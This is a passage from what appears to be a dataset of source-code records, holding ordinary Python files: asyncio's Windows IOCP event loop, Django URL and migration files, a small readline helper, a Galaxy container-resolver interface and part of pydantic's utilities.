ERROR_IO_PENDING means that the unregister is pending\r\n\r\n self._unregister_wait_cb(None)\r\n\r\n def cancel(self, msg=None):\r\n self._unregister_wait()\r\n return super().cancel(msg=msg)\r\n\r\n def set_exception(self, exception):\r\n self._unregister_wait()\r\n super().set_exception(exception)\r\n\r\n def set_result(self, result):\r\n self._unregister_wait()\r\n super().set_result(result)\r\n\r\n\r\nclass _WaitCancelFuture(_BaseWaitHandleFuture):\r\n \"\"\"Subclass of Future which represents a wait for the cancellation of a\r\n _WaitHandleFuture using an event.\r\n \"\"\"\r\n\r\n def __init__(self, ov, event, wait_handle, *, loop=None):\r\n super().__init__(ov, event, wait_handle, loop=loop)\r\n\r\n self._done_callback = None\r\n\r\n def cancel(self):\r\n raise RuntimeError(\"_WaitCancelFuture must not be cancelled\")\r\n\r\n def set_result(self, result):\r\n super().set_result(result)\r\n if self._done_callback is not None:\r\n self._done_callback(self)\r\n\r\n def set_exception(self, exception):\r\n super().set_exception(exception)\r\n if self._done_callback is not None:\r\n self._done_callback(self)\r\n\r\n\r\nclass _WaitHandleFuture(_BaseWaitHandleFuture):\r\n def __init__(self, ov, handle, wait_handle, proactor, *, loop=None):\r\n super().__init__(ov, handle, wait_handle, loop=loop)\r\n self._proactor = proactor\r\n self._unregister_proactor = True\r\n self._event = _overlapped.CreateEvent(None, True, False, None)\r\n self._event_fut = None\r\n\r\n def _unregister_wait_cb(self, fut):\r\n if self._event is not None:\r\n _winapi.CloseHandle(self._event)\r\n self._event = None\r\n self._event_fut = None\r\n\r\n # If the wait was cancelled, the wait may never be signalled, so\r\n # it's required to unregister it. 
Otherwise, IocpProactor.close() will\r\n # wait forever for an event which will never come.\r\n #\r\n # If the IocpProactor already received the event, it's safe to call\r\n # _unregister() because we kept a reference to the Overlapped object\r\n # which is used as a unique key.\r\n self._proactor._unregister(self._ov)\r\n self._proactor = None\r\n\r\n super()._unregister_wait_cb(fut)\r\n\r\n def _unregister_wait(self):\r\n if not self._registered:\r\n return\r\n self._registered = False\r\n\r\n wait_handle = self._wait_handle\r\n self._wait_handle = None\r\n try:\r\n _overlapped.UnregisterWaitEx(wait_handle, self._event)\r\n except OSError as exc:\r\n if exc.winerror != _overlapped.ERROR_IO_PENDING:\r\n context = {\r\n 'message': 'Failed to unregister the wait handle',\r\n 'exception': exc,\r\n 'future': self,\r\n }\r\n if self._source_traceback:\r\n context['source_traceback'] = self._source_traceback\r\n self._loop.call_exception_handler(context)\r\n return\r\n # ERROR_IO_PENDING is not an error, the wait was unregistered\r\n\r\n self._event_fut = self._proactor._wait_cancel(self._event,\r\n self._unregister_wait_cb)\r\n\r\n\r\nclass PipeServer(object):\r\n \"\"\"Class representing a pipe server.\r\n\r\n This is much like a bound, listening socket.\r\n \"\"\"\r\n def __init__(self, address):\r\n self._address = address\r\n self._free_instances = weakref.WeakSet()\r\n # initialize the pipe attribute before calling _server_pipe_handle()\r\n # because this function can raise an exception and the destructor calls\r\n # the close() method\r\n self._pipe = None\r\n self._accept_pipe_future = None\r\n self._pipe = self._server_pipe_handle(True)\r\n\r\n def _get_unconnected_pipe(self):\r\n # Create new instance and return previous one. This ensures\r\n # that (until the server is closed) there is always at least\r\n # one pipe handle for address. 
Therefore if a client attempt\r\n # to connect it will not fail with FileNotFoundError.\r\n tmp, self._pipe = self._pipe, self._server_pipe_handle(False)\r\n return tmp\r\n\r\n def _server_pipe_handle(self, first):\r\n # Return a wrapper for a new pipe handle.\r\n if self.closed():\r\n return None\r\n flags = _winapi.PIPE_ACCESS_DUPLEX | _winapi.FILE_FLAG_OVERLAPPED\r\n if first:\r\n flags |= _winapi.FILE_FLAG_FIRST_PIPE_INSTANCE\r\n h = _winapi.CreateNamedPipe(\r\n self._address, flags,\r\n _winapi.PIPE_TYPE_MESSAGE | _winapi.PIPE_READMODE_MESSAGE |\r\n _winapi.PIPE_WAIT,\r\n _winapi.PIPE_UNLIMITED_INSTANCES,\r\n windows_utils.BUFSIZE, windows_utils.BUFSIZE,\r\n _winapi.NMPWAIT_WAIT_FOREVER, _winapi.NULL)\r\n pipe = windows_utils.PipeHandle(h)\r\n self._free_instances.add(pipe)\r\n return pipe\r\n\r\n def closed(self):\r\n return (self._address is None)\r\n\r\n def close(self):\r\n if self._accept_pipe_future is not None:\r\n self._accept_pipe_future.cancel()\r\n self._accept_pipe_future = None\r\n # Close all instances which have not been connected to by a client.\r\n if self._address is not None:\r\n for pipe in self._free_instances:\r\n pipe.close()\r\n self._pipe = None\r\n self._address = None\r\n self._free_instances.clear()\r\n\r\n __del__ = close\r\n\r\n\r\nclass _WindowsSelectorEventLoop(selector_events.BaseSelectorEventLoop):\r\n \"\"\"Windows version of selector event loop.\"\"\"\r\n\r\n\r\nclass ProactorEventLoop(proactor_events.BaseProactorEventLoop):\r\n \"\"\"Windows version of proactor event loop using IOCP.\"\"\"\r\n\r\n def __init__(self, proactor=None):\r\n if proactor is None:\r\n proactor = IocpProactor()\r\n super().__init__(proactor)\r\n\r\n def run_forever(self):\r\n try:\r\n assert self._self_reading_future is None\r\n self.call_soon(self._loop_self_reading)\r\n super().run_forever()\r\n finally:\r\n if self._self_reading_future is not None:\r\n ov = self._self_reading_future._ov\r\n self._self_reading_future.cancel()\r\n # self_reading_future was just cancelled so if it hasn't been\r\n # finished yet, it never will be (it's possible that it has\r\n # already finished and its callback is waiting in the queue,\r\n # where it could still happen if the event loop is restarted).\r\n # Unregister it otherwise IocpProactor.close will wait for it\r\n # forever\r\n if ov is not None:\r\n self._proactor._unregister(ov)\r\n self._self_reading_future = None\r\n\r\n async def create_pipe_connection(self, protocol_factory, address):\r\n f = self._proactor.connect_pipe(address)\r\n pipe = await f\r\n protocol = protocol_factory()\r\n trans = self._make_duplex_pipe_transport(pipe, protocol,\r\n extra={'addr': address})\r\n return trans, protocol\r\n\r\n async def start_serving_pipe(self, protocol_factory, address):\r\n server = PipeServer(address)\r\n\r\n def loop_accept_pipe(f=None):\r\n pipe = None\r\n try:\r\n if f:\r\n pipe = f.result()\r\n server._free_instances.discard(pipe)\r\n\r\n if server.closed():\r\n # A client connected before the server was closed:\r\n # drop the client (close the pipe) and exit\r\n pipe.close()\r\n return\r\n\r\n protocol = protocol_factory()\r\n self._make_duplex_pipe_transport(\r\n pipe, protocol, extra={'addr': address})\r\n\r\n pipe = server._get_unconnected_pipe()\r\n if pipe is None:\r\n return\r\n\r\n f = self._proactor.accept_pipe(pipe)\r\n except OSError as exc:\r\n if pipe and pipe.fileno() != -1:\r\n self.call_exception_handler({\r\n 'message': 'Pipe accept failed',\r\n 'exception': exc,\r\n 'pipe': pipe,\r\n })\r\n pipe.close()\r\n 
elif self._debug:\r\n logger.warning(\"Accept pipe failed on pipe %r\",\r\n pipe, exc_info=True)\r\n except exceptions.CancelledError:\r\n if pipe:\r\n pipe.close()\r\n else:\r\n server._accept_pipe_future = f\r\n f.add_done_callback(loop_accept_pipe)\r\n\r\n self.call_soon(loop_accept_pipe)\r\n return [server]\r\n\r\n async def _make_subprocess_transport(self, protocol, args, shell,\r\n stdin, stdout, stderr, bufsize,\r\n extra=None, **kwargs):\r\n waiter = self.create_future()\r\n transp = _WindowsSubprocessTransport(self, protocol, args, shell,\r\n stdin, stdout, stderr, bufsize,\r\n waiter=waiter, extra=extra,\r\n **kwargs)\r\n try:\r\n await waiter\r\n except (SystemExit, KeyboardInterrupt):\r\n raise\r\n except BaseException:\r\n transp.close()\r\n await transp._wait()\r\n raise\r\n\r\n return transp\r\n\r\n\r\nclass IocpProactor:\r\n \"\"\"Proactor implementation using IOCP.\"\"\"\r\n\r\n def __init__(self, concurrency=0xffffffff):\r\n self._loop = None\r\n self._results = []\r\n self._iocp = _overlapped.CreateIoCompletionPort(\r\n _overlapped.INVALID_HANDLE_VALUE, NULL, 0, concurrency)\r\n self._cache = {}\r\n self._registered = weakref.WeakSet()\r\n self._unregistered = []\r\n self._stopped_serving = weakref.WeakSet()\r\n\r\n def _check_closed(self):\r\n if self._iocp is None:\r\n raise RuntimeError('IocpProactor is closed')\r\n\r\n def __repr__(self):\r\n info = ['overlapped#=%s' % len(self._cache),\r\n 'result#=%s' % len(self._results)]\r\n if self._iocp is None:\r\n info.append('closed')\r\n return '<%s %s>' % (self.__class__.__name__, \" \".join(info))\r\n\r\n def set_loop(self, loop):\r\n self._loop = loop\r\n\r\n def select(self, timeout=None):\r\n if not self._results:\r\n self._poll(timeout)\r\n tmp = self._results\r\n self._results = []\r\n return tmp\r\n\r\n def _result(self, value):\r\n fut = self._loop.create_future()\r\n fut.set_result(value)\r\n return fut\r\n\r\n def recv(self, conn, nbytes, flags=0):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n try:\r\n if isinstance(conn, socket.socket):\r\n ov.WSARecv(conn.fileno(), nbytes, flags)\r\n else:\r\n ov.ReadFile(conn.fileno(), nbytes)\r\n except BrokenPipeError:\r\n return self._result(b'')\r\n\r\n def finish_recv(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_recv)\r\n\r\n def recv_into(self, conn, buf, flags=0):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n try:\r\n if isinstance(conn, socket.socket):\r\n ov.WSARecvInto(conn.fileno(), buf, flags)\r\n else:\r\n ov.ReadFileInto(conn.fileno(), buf)\r\n except BrokenPipeError:\r\n return self._result(0)\r\n\r\n def finish_recv(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_recv)\r\n\r\n def recvfrom(self, conn, nbytes, flags=0):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n try:\r\n ov.WSARecvFrom(conn.fileno(), nbytes, flags)\r\n except BrokenPipeError:\r\n return self._result((b'', None))\r\n\r\n def finish_recv(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if 
exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_recv)\r\n\r\n def sendto(self, conn, buf, flags=0, addr=None):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n\r\n ov.WSASendTo(conn.fileno(), buf, flags, addr)\r\n\r\n def finish_send(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_send)\r\n\r\n def send(self, conn, buf, flags=0):\r\n self._register_with_iocp(conn)\r\n ov = _overlapped.Overlapped(NULL)\r\n if isinstance(conn, socket.socket):\r\n ov.WSASend(conn.fileno(), buf, flags)\r\n else:\r\n ov.WriteFile(conn.fileno(), buf)\r\n\r\n def finish_send(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n\r\n return self._register(ov, conn, finish_send)\r\n\r\n def accept(self, listener):\r\n self._register_with_iocp(listener)\r\n conn = self._get_accept_socket(listener.family)\r\n ov = _overlapped.Overlapped(NULL)\r\n ov.AcceptEx(listener.fileno(), conn.fileno())\r\n\r\n def finish_accept(trans, key, ov):\r\n ov.getresult()\r\n # Use SO_UPDATE_ACCEPT_CONTEXT so getsockname() etc work.\r\n buf = struct.pack('@P', listener.fileno())\r\n conn.setsockopt(socket.SOL_SOCKET,\r\n _overlapped.SO_UPDATE_ACCEPT_CONTEXT, buf)\r\n conn.settimeout(listener.gettimeout())\r\n return conn, conn.getpeername()\r\n\r\n async def accept_coro(future, conn):\r\n # Coroutine closing the accept socket if the future is cancelled\r\n try:\r\n await future\r\n except exceptions.CancelledError:\r\n conn.close()\r\n raise\r\n\r\n future = self._register(ov, listener, finish_accept)\r\n coro = accept_coro(future, conn)\r\n tasks.ensure_future(coro, loop=self._loop)\r\n return future\r\n\r\n def connect(self, conn, address):\r\n if conn.type == socket.SOCK_DGRAM:\r\n # WSAConnect will complete immediately for UDP sockets so we don't\r\n # need to register any IOCP operation\r\n _overlapped.WSAConnect(conn.fileno(), address)\r\n fut = self._loop.create_future()\r\n fut.set_result(None)\r\n return fut\r\n\r\n self._register_with_iocp(conn)\r\n # The socket needs to be locally bound before we call ConnectEx().\r\n try:\r\n _overlapped.BindLocal(conn.fileno(), conn.family)\r\n except OSError as e:\r\n if e.winerror != errno.WSAEINVAL:\r\n raise\r\n # Probably already locally bound; check using getsockname().\r\n if conn.getsockname()[1] == 0:\r\n raise\r\n ov = _overlapped.Overlapped(NULL)\r\n ov.ConnectEx(conn.fileno(), address)\r\n\r\n def finish_connect(trans, key, ov):\r\n ov.getresult()\r\n # Use SO_UPDATE_CONNECT_CONTEXT so getsockname() etc work.\r\n conn.setsockopt(socket.SOL_SOCKET,\r\n _overlapped.SO_UPDATE_CONNECT_CONTEXT, 0)\r\n return conn\r\n\r\n return self._register(ov, conn, finish_connect)\r\n\r\n def sendfile(self, sock, file, offset, count):\r\n self._register_with_iocp(sock)\r\n ov = _overlapped.Overlapped(NULL)\r\n offset_low = offset & 0xffff_ffff\r\n offset_high = (offset >> 32) & 0xffff_ffff\r\n ov.TransmitFile(sock.fileno(),\r\n msvcrt.get_osfhandle(file.fileno()),\r\n offset_low, 
offset_high,\r\n count, 0, 0)\r\n\r\n def finish_sendfile(trans, key, ov):\r\n try:\r\n return ov.getresult()\r\n except OSError as exc:\r\n if exc.winerror in (_overlapped.ERROR_NETNAME_DELETED,\r\n _overlapped.ERROR_OPERATION_ABORTED):\r\n raise ConnectionResetError(*exc.args)\r\n else:\r\n raise\r\n return self._register(ov, sock, finish_sendfile)\r\n\r\n def accept_pipe(self, pipe):\r\n self._register_with_iocp(pipe)\r\n ov = _overlapped.Overlapped(NULL)\r\n connected = ov.ConnectNamedPipe(pipe.fileno())\r\n\r\n if connected:\r\n # ConnectNamePipe() failed with ERROR_PIPE_CONNECTED which means\r\n # that the pipe is connected. There is no need to wait for the\r\n # completion of the connection.\r\n return self._result(pipe)\r\n\r\n def finish_accept_pipe(trans, key, ov):\r\n ov.getresult()\r\n return pipe\r\n\r\n return self._register(ov, pipe, finish_accept_pipe)\r\n\r\n async def connect_pipe(self, address):\r\n delay = CONNECT_PIPE_INIT_DELAY\r\n while True:\r\n # Unfortunately there is no way to do an overlapped connect to\r\n # a pipe. Call CreateFile() in a loop until it doesn't fail with\r\n # ERROR_PIPE_BUSY.\r\n try:\r\n handle = _overlapped.ConnectPipe(address)\r\n break\r\n except OSError as exc:\r\n if exc.winerror != _overlapped.ERROR_PIPE_BUSY:\r\n raise\r\n\r\n # ConnectPipe() failed with ERROR_PIPE_BUSY: retry later\r\n delay = min(delay * 2, CONNECT_PIPE_MAX_DELAY)\r\n await tasks.sleep(delay)\r\n\r\n return windows_utils.PipeHandle(handle)\r\n\r\n def wait_for_handle(self, handle, timeout=None):\r\n \"\"\"Wait for a handle.\r\n\r\n Return a Future object. The result of the future is True if the wait\r\n completed, or False if the wait did not complete (on timeout).\r\n \"\"\"\r\n return self._wait_for_handle(handle, timeout, False)\r\n\r\n def _wait_cancel(self, event, done_callback):\r\n fut = self._wait_for_handle(event, None, True)\r\n # add_done_callback() cannot be used because the wait may only complete\r\n # in IocpProactor.close(), while the event loop is not running.\r\n fut._done_callback = done_callback\r\n return fut\r\n\r\n def _wait_for_handle(self, handle, timeout, _is_cancel):\r\n self._check_closed()\r\n\r\n if timeout is None:\r\n ms = _winapi.INFINITE\r\n else:\r\n # RegisterWaitForSingleObject() has a resolution of 1 millisecond,\r\n # round away from zero to wait *at least* timeout seconds.\r\n ms = math.ceil(timeout * 1e3)\r\n\r\n # We only create ov so we can use ov.address as a key for the cache.\r\n ov = _overlapped.Overlapped(NULL)\r\n wait_handle = _overlapped.RegisterWaitWithQueue(\r\n handle, self._iocp, ov.address, ms)\r\n if _is_cancel:\r\n f = _WaitCancelFuture(ov, handle, wait_handle, loop=self._loop)\r\n else:\r\n f = _WaitHandleFuture(ov, handle, wait_handle, self,\r\n loop=self._loop)\r\n if f._source_traceback:\r\n del f._source_traceback[-1]\r\n\r\n def finish_wait_for_handle(trans, key, ov):\r\n # Note that this second wait means that we should only use\r\n # this with handles types where a successful wait has no\r\n # effect. So events or processes are all right, but locks\r\n # or semaphores are not. 
Also note if the handle is\r\n # signalled and then quickly reset, then we may return\r\n # False even though we have not timed out.\r\n return f._poll()\r\n\r\n self._cache[ov.address] = (f, ov, 0, finish_wait_for_handle)\r\n return f\r\n\r\n def _register_with_iocp(self, obj):\r\n # To get notifications of finished ops on this objects sent to the\r\n # completion port, were must register the handle.\r\n if obj not in self._registered:\r\n self._registered.add(obj)\r\n _overlapped.CreateIoCompletionPort(obj.fileno(), self._iocp, 0, 0)\r\n # XXX We could also use SetFileCompletionNotificationModes()\r\n # to avoid sending notifications to completion port of ops\r\n # that succeed immediately.\r\n\r\n def _register(self, ov, obj, callback):\r\n self._check_closed()\r\n\r\n # Return a future which will be set with the result of the\r\n # operation when it completes. The future's value is actually\r\n # the value returned by callback().\r\n f = _OverlappedFuture(ov, loop=self._loop)\r\n if f._source_traceback:\r\n del f._source_traceback[-1]\r\n if not ov.pending:\r\n # The operation has completed, so no need to postpone the\r\n # work. We cannot take this short cut if we need the\r\n # NumberOfBytes, CompletionKey values returned by\r\n # PostQueuedCompletionStatus().\r\n try:\r\n value = callback(None, None, ov)\r\n except OSError as e:\r\n f.set_exception(e)\r\n else:\r\n f.set_result(value)\r\n # Even if GetOverlappedResult() was called, we have to wait for the\r\n # notification of the completion in GetQueuedCompletionStatus().\r\n # Register the overlapped operation to keep a reference to the\r\n # OVERLAPPED object, otherwise the memory is freed and Windows may\r\n # read uninitialized memory.\r\n\r\n # Register the overlapped operation for later. Note that\r\n # we only store obj to prevent it from being garbage\r\n # collected too early.\r\n self._cache[ov.address] = (f, ov, obj, callback)\r\n return f\r\n\r\n def _unregister(self, ov):\r\n \"\"\"Unregister an overlapped object.\r\n\r\n Call this method when its future has been cancelled. The event can\r\n already be signalled (pending in the proactor event queue). 
It is also\r\n safe if the event is never signalled (because it was cancelled).\r\n \"\"\"\r\n self._check_closed()\r\n self._unregistered.append(ov)\r\n\r\n def _get_accept_socket(self, family):\r\n s = socket.socket(family)\r\n s.settimeout(0)\r\n return s\r\n\r\n def _poll(self, timeout=None):\r\n if timeout is None:\r\n ms = INFINITE\r\n elif timeout < 0:\r\n raise ValueError(\"negative timeout\")\r\n else:\r\n # GetQueuedCompletionStatus() has a resolution of 1 millisecond,\r\n # round away from zero to wait *at least* timeout seconds.\r\n ms = math.ceil(timeout * 1e3)\r\n if ms >= INFINITE:\r\n raise ValueError(\"timeout too big\")\r\n\r\n while True:\r\n status = _overlapped.GetQueuedCompletionStatus(self._iocp, ms)\r\n if status is None:\r\n break\r\n ms = 0\r\n\r\n err, transferred, key, address = status\r\n try:\r\n f, ov, obj, callback = self._cache.pop(address)\r\n except KeyError:\r\n if self._loop.get_debug():\r\n self._loop.call_exception_handler({\r\n 'message': ('GetQueuedCompletionStatus() returned an '\r\n 'unexpected event'),\r\n 'status': ('err=%s transferred=%s key=%#x address=%#x'\r\n % (err, transferred, key, address)),\r\n })\r\n\r\n # key is either zero, or it is used to return a pipe\r\n # handle which should be closed to avoid a leak.\r\n if key not in (0, _overlapped.INVALID_HANDLE_VALUE):\r\n _winapi.CloseHandle(key)\r\n continue\r\n\r\n if obj in self._stopped_serving:\r\n f.cancel()\r\n # Don't call the callback if _register() already read the result or\r\n # if the overlapped has been cancelled\r\n elif not f.done():\r\n try:\r\n value = callback(transferred, key, ov)\r\n except OSError as e:\r\n f.set_exception(e)\r\n self._results.append(f)\r\n else:\r\n f.set_result(value)\r\n self._results.append(f)\r\n\r\n # Remove unregistered futures\r\n for ov in self._unregistered:\r\n self._cache.pop(ov.address, None)\r\n self._unregistered.clear()\r\n\r\n def _stop_serving(self, obj):\r\n # obj is a socket or pipe handle. It will be closed in\r\n # BaseProactorEventLoop._stop_serving() which will make any\r\n # pending operations fail quickly.\r\n self._stopped_serving.add(obj)\r\n\r\n def close(self):\r\n if self._iocp is None:\r\n # already closed\r\n return\r\n\r\n # Cancel remaining registered operations.\r\n for address, (fut, ov, obj, callback) in list(self._cache.items()):\r\n if fut.cancelled():\r\n # Nothing to do with cancelled futures\r\n pass\r\n elif isinstance(fut, _WaitCancelFuture):\r\n # _WaitCancelFuture must not be cancelled\r\n pass\r\n else:\r\n try:\r\n fut.cancel()\r\n except OSError as exc:\r\n if self._loop is not None:\r\n context = {\r\n 'message': 'Cancelling a future failed',\r\n 'exception': exc,\r\n 'future': fut,\r\n }\r\n if fut._source_traceback:\r\n context['source_traceback'] = fut._source_traceback\r\n self._loop.call_exception_handler(context)\r\n\r\n # Wait until all cancelled overlapped complete: don't exit with running\r\n # overlapped to prevent a crash. 
Display progress every second if the\r\n # loop is still running.\r\n msg_update = 1.0\r\n start_time = time.monotonic()\r\n next_msg = start_time + msg_update\r\n while self._cache:\r\n if next_msg <= time.monotonic():\r\n logger.debug('%r is running after closing for %.1f seconds',\r\n self, time.monotonic() - start_time)\r\n next_msg = time.monotonic() + msg_update\r\n\r\n # handle a few events, or timeout\r\n self._poll(msg_update)\r\n\r\n self._results = []\r\n\r\n _winapi.CloseHandle(self._iocp)\r\n self._iocp = None\r\n\r\n def __del__(self):\r\n self.close()\r\n\r\n\r\nclass _WindowsSubprocessTransport(base_subprocess.BaseSubprocessTransport):\r\n\r\n def _start(self, args, shell, stdin, stdout, stderr, bufsize, **kwargs):\r\n self._proc = windows_utils.Popen(\r\n args, shell=shell, stdin=stdin, stdout=stdout, stderr=stderr,\r\n bufsize=bufsize, **kwargs)\r\n\r\n def callback(f):\r\n returncode = self._proc.poll()\r\n self._process_exited(returncode)\r\n\r\n f = self._loop._proactor.wait_for_handle(int(self._proc._handle))\r\n f.add_done_callback(callback)\r\n\r\n\r\nSelectorEventLoop = _WindowsSelectorEventLoop\r\n\r\n\r\nclass WindowsSelectorEventLoopPolicy(events.BaseDefaultEventLoopPolicy):\r\n _loop_factory = SelectorEventLoop\r\n\r\n\r\nclass WindowsProactorEventLoopPolicy(events.BaseDefaultEventLoopPolicy):\r\n _loop_factory = ProactorEventLoop\r\n\r\n\r\nDefaultEventLoopPolicy = WindowsProactorEventLoopPolicy\r\n"} {"ext": "py", "sha": "1a31167fc6d4ad18de810b003a848158d49dfdf9", "content": "from django.urls import path, include\n\nfrom comment.api.views import CommentCreateApiView, CommentListApiView, CommentValidateApiView\n\napp_name = \"comment\"\n\nurlpatterns = [\n path('create/', CommentCreateApiView.as_view(), name='create'),\n path('list/', CommentListApiView.as_view(), name='list'),\n path('validate/<pk>', CommentValidateApiView.as_view(), name='validate'),\n\n \n\n\n]\n"} {"ext": "py", "sha": "1a31173f08fa3cd58402e85b4441216381a3771e", "content": "def readline(f, newline):\n buf = \"\"\n while True:\n while newline in buf:\n pos = buf.index(newline)\n yield buf[:pos]\n buf = buf[pos + len(newline):]\n chunk = f.read(4096 * 10)\n if not chunk:\n yield buf\n break\n buf += chunk\n\n\nwith open(\"index.txt\") as f:\n for line in readline(f, \"{|}\"):\n print(line)\n"} {"ext": "py", "sha": "1a311761b476828346ffb5aebe93651f0964e2fc", "content": "# Generated by Django 3.0 on 2021-01-05 14:01\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Action',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('verb', models.CharField(max_length=255)),\n ('created', models.DateTimeField(auto_now_add=True, db_index=True)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='actions', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ('-created',),\n },\n ),\n ]\n"} {"ext": "py", "sha": "1a3118ff32aac1c9165b9f878ca8b8f876541a2e", "content": "\"\"\"The module defines the abstract interface for resolving container images for tool execution.\"\"\"\nfrom abc import (\n ABCMeta,\n abstractmethod,\n abstractproperty,\n)\n\nfrom galaxy.util.bunch import Bunch\nfrom galaxy.util.dictifiable import Dictifiable\n\n\nclass 
ResolutionCache(Bunch):\n \"\"\"Simple cache for duplicated computation created once per set of requests (likely web request in Galaxy context).\n\n This should not be assumed to be thread safe - resolution using a given cache should all occur\n one resolution at a time in a single thread.\n \"\"\"\n\n mulled_resolution_cache = None\n\n\nclass ContainerResolver(Dictifiable, metaclass=ABCMeta):\n \"\"\"Description of a technique for resolving container images for tool execution.\"\"\"\n\n # Keys for dictification.\n dict_collection_visible_keys = [\"resolver_type\", \"can_uninstall_dependencies\", \"builds_on_resolution\"]\n can_uninstall_dependencies = False\n builds_on_resolution = False\n read_only = True # not used for containers, but set for when they are used like dependency resolvers\n\n def __init__(self, app_info=None, **kwds):\n \"\"\"Default initializer for ``ContainerResolver`` subclasses.\"\"\"\n self.app_info = app_info\n self.resolver_kwds = kwds\n\n def _get_config_option(self, key, default=None):\n \"\"\"Look in resolver-specific settings for option and then fallback to\n global settings.\n \"\"\"\n if self.app_info and hasattr(self.app_info, key):\n return getattr(self.app_info, key)\n else:\n return default\n\n @abstractmethod\n def resolve(self, enabled_container_types, tool_info, resolution_cache=None, **kwds):\n \"\"\"Find a container matching all supplied requirements for tool.\n\n The supplied argument is a :class:`galaxy.tool_util.deps.containers.ToolInfo` description\n of the tool and its requirements.\n \"\"\"\n\n @abstractproperty\n def resolver_type(self):\n \"\"\"Short label for the type of container resolution.\"\"\"\n\n def _container_type_enabled(self, container_description, enabled_container_types):\n \"\"\"Return a boolean indicating if the specified container type is enabled.\"\"\"\n return container_description.type in enabled_container_types\n\n def __str__(self):\n return f\"{self.__class__.__name__}[]\"\n"} {"ext": "py", "sha": "1a31192a5e77861da5836b222bf9b668132d1eac", "content": "import warnings\nfrom itertools import islice\nfrom types import GeneratorType\nfrom typing import (\n TYPE_CHECKING,\n AbstractSet,\n Any,\n Callable,\n Dict,\n Generator,\n Iterator,\n List,\n Optional,\n Set,\n Tuple,\n Type,\n TypeVar,\n Union,\n no_type_check,\n)\n\nfrom .typing import AnyType, display_as_type\nfrom .version import version_info\n\nif TYPE_CHECKING:\n from inspect import Signature\n from .main import BaseModel, BaseConfig # noqa: F401\n from .typing import AbstractSetIntStr, DictIntStrAny, IntStr, MappingIntStrAny, ReprArgs # noqa: F401\n from .fields import ModelField # noqa: F401\n from .dataclasses import DataclassType # noqa: F401\n\n__all__ = (\n 'import_string',\n 'sequence_like',\n 'validate_field_name',\n 'lenient_issubclass',\n 'in_ipython',\n 'deep_update',\n 'update_not_none',\n 'almost_equal_floats',\n 'get_model',\n 'to_camel',\n 'PyObjectStr',\n 'Representation',\n 'GetterDict',\n 'ValueItems',\n 'version_info', # required here to match behaviour in v1.3\n)\n\n\ndef import_string(dotted_path: str) -> Any:\n \"\"\"\n Stolen approximately from django. Import a dotted module path and return the attribute/class designated by the\n last name in the path. 
Raise ImportError if the import fails.\n \"\"\"\n from importlib import import_module\n\n try:\n module_path, class_name = dotted_path.strip(' ').rsplit('.', 1)\n except ValueError as e:\n raise ImportError(f'\"{dotted_path}\" doesn\\'t look like a module path') from e\n\n module = import_module(module_path)\n try:\n return getattr(module, class_name)\n except AttributeError as e:\n raise ImportError(f'Module \"{module_path}\" does not define a \"{class_name}\" attribute') from e\n\n\ndef truncate(v: Union[str], *, max_len: int = 80) -> str:\n \"\"\"\n Truncate a value and add a unicode ellipsis (three dots) to the end if it was too long\n \"\"\"\n warnings.warn('`truncate` is no-longer used by pydantic and is deprecated', DeprecationWarning)\n if isinstance(v, str) and len(v) > (max_len - 2):\n # -3 so quote + string + … + quote has correct length\n return (v[: (max_len - 3)] + '…').__repr__()\n try:\n v = v.__repr__()\n except TypeError:\n v = v.__class__.__repr__(v) # in case v is a type\n if len(v) > max_len:\n v = v[: max_len - 1] + '…'\n return v\n\n\ndef sequence_like(v: AnyType) -> bool:\n return isinstance(v, (list, tuple, set, frozenset, GeneratorType))\n\n\ndef validate_field_name(bases: List[Type['BaseModel']], field_name: str) -> None:\n \"\"\"\n Ensure that the field's name does not shadow an existing attribute of the model.\n \"\"\"\n for base in bases:\n if getattr(base, field_name, None):\n raise NameError(\n f'Field name \"{field_name}\" shadows a BaseModel attribute; '\n f'use a different field name with \"alias=\\'{field_name}\\'\".'\n )\n\n\ndef lenient_issubclass(cls: Any, class_or_tuple: Union[AnyType, Tuple[AnyType, ...]]) -> bool:\n return isinstance(cls, type) and issubclass(cls, class_or_tuple)\n\n\ndef in_ipython() -> bool:\n \"\"\"\n Check whether we're in an ipython environment, including jupyter notebooks.\n \"\"\"\n try:\n eval('__IPYTHON__')\n except NameError:\n return False\n else: # pragma: no cover\n return True\n\n\nKeyType = 